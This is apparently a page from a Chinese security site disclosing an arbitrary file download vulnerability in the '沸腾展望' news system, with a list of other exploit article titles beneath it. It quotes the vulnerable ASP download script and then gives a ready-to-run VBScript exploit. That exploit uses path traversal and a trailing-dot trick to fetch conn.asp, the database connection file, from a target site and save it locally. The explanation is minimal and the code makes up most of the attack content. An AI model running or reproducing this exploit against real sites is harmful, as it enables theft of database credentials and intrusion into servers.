|
[推荐]沸腾展望新闻系统任意文件下载漏洞
| 以下是引用片段: Const adTypeBinary = 1 FileName = Request.QueryString("FileName") if FileName = "" Then Response.Write "无效文件名!" Response.End End if FileExt = Mid(FileName, InStrRev(FileName, ".") + 1) Select Case UCase(FileExt) Case "ASP", "ASA", "ASPX", "ASAX", "MDB" Response.Write "非法操作!" Response.End End Select Response.Clear if lcase(right(FileName,3))="gif" or lcase(right(FileName,3))="jpg" or lcase(right(FileName,3))="png" then Response.ContentType = "image/*" '对图像文件不出现下载对话框 else Response.ContentType = "application/ms-download" end if Response.AddHeader "content-disposition", "attachment; filename=" & GetFileName(Request.QueryString("FileName")) Set Stream = server.CreateObject("ADODB.Stream") Stream.Type = adTypeBinary Stream.Open SavePath = FileUploadPath '存放上传文件的目录 TrueFileName = SavePath & FileName Stream.LoadFromFile Server.MapPath(TrueFileName) While Not Stream.EOS Response.BinaryWrite Stream.Read(1024 * 64) Wend |
| 以下是引用片段: Dim strUrl, strData strUrl = "http://www.target.com/down.asp?FileName=../conn.asp." Set xPost = CreateObject("Microsoft.XMLHTTP") With xPost .open "Get", strUrl, False .SetRequestHeader "Referer", strUrl .Send() strData = .responseBody End with Set sGet = CreateObject("ADODB.Stream") With sGet .Mode = 3 .Type = 1 .Open() .Write(strData) .SaveToFile "Conn.asp",2 End with set sGet = Nothing set xPost = Nothin |
| 新云CMS Online.asp页面过滤不严 | 02-26 |
| 对网软网上购物系统的漏洞分析 | 01-09 |
| 测试SQL防注入脚本 | 12-21 |
| Google Xss又出跨站新漏洞 | 11-06 |
| 一次简单的html injection导致的 | 11-06 |
| 风讯、科讯漏洞利用 | 11-01 |
| Adobe pdf reader URI利用方式浅 | 10-23 |
| 超星阅览器的最新0DAY | 10-19 |
| 运用SQL Injection做数据库渗透的 | 09-22 |
| sa-blog 0day | 09-22 |
| HTML注入的一些简单想法 | 09-10 |
| 网站登陆接口的攻与防 | 09-04 |
您现在的位置: